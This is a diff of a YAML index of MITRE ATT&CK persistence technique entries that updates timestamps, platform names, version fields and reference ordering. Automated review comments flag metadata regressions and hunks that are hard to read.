@@ -33236,7 +33647,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
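Review bot: the `modified` timestamp for T1505.004 moves backwards, from '2022-04-25T14:00:00.188Z' to '2021-10-17T15:06:24.161Z', and the same regression appears on several other objects below (T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1197, T1546.010, T1543.001, T1505). Nearly all of the old values end in 14:00:00.188Z, which looks like a placeholder rather than a real edit time, so the new values are probably the authoritative ones; please confirm in the PR description which ATT&CK release the index was regenerated from so the regression is explained rather than left for the next reader to puzzle over.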
@@ -33261,13 +33672,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
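Review bot: T1505.004 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, whereas other objects in this diff keep or update `x_mitre_attack_spec_version` (T1547.002 and T1037.005 keep 2.1.0 as unchanged context; T1556.006 gets 3.2.0). T1037.003 later in the diff loses the field the same way. Check whether the upstream objects really lack the field or whether the generator drops it when the object is not otherwise rewritten.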
@@ -33320,8 +33729,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33369,78 +33778,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33488,6 +33830,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -33498,9 +33844,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -33509,8 +33859,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
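Review bot: buried in what is otherwise a move of T1546.004's `external_references` block to the end of the object, the `bencane blog bashrc` reference changes substantively: its URL becomes a web.archive.org capture of the original bencane.com post and its retrieved date changes from February 25, 2021 to September 25, 2024. That is the one real edit in this hunk and should be called out in the PR description. The moved block also gains `revoked: false` and reorders the references; all thirteen `source_name` entries from the removed block are still present by my count, but a stable key order from the generator would have made that obvious without counting.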
@@ -33547,7 +33956,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33570,12 +33979,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -33653,41 +34061,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33696,27 +34074,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
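Review bot: `x_mitre_permissions_required` (Administrator, User) is removed from T1137.004 with no replacement, while T1546.004 earlier in this diff keeps its `x_mitre_permissions_required` list as unchanged context, and T1556.001 and T1556.005 below lose the field the same way. Either the upstream objects diverge or the generator is inconsistent; state which, since any reporting that groups techniques by required permission will see these entries disappear.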
@@ -33777,7 +34182,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -33821,7 +34225,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -33843,7 +34247,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -33924,7 +34327,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -33947,7 +34349,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -33977,12 +34379,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34072,12 +34472,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34162,7 +34561,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34227,18 +34625,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34271,10 +34668,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
@@ -34311,7 +34707,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34385,7 +34780,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34413,12 +34808,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -34477,33 +34871,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34524,6 +34895,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -34538,52 +34910,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
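Review bot: this hunk interleaves two objects: the removed lines from `atomic_tests: []` / `T1556.005:` through the four T1556.005 references (store_pwd_rev_enc, how_pwd_rev_enc_1, how_pwd_rev_enc_2, dump_pwd_dcsync) are T1556.005's old header, which the diff has paired against T1556.001's relocated `external_references`. The T1556.005 references reappear later in the diff at the end of that object, so no reference is lost, and T1556.005's `modified` moves from '2022-05-11T14:00:00.188Z' to '2024-08-26T15:40:31.871Z', but none of that is readable from this hunk alone. Regenerating the diff with a histogram or patience algorithm, or stating in the PR that this is a key reorder, would save the next reviewer from reconstructing it by hand.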
@@ -34605,6 +34967,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
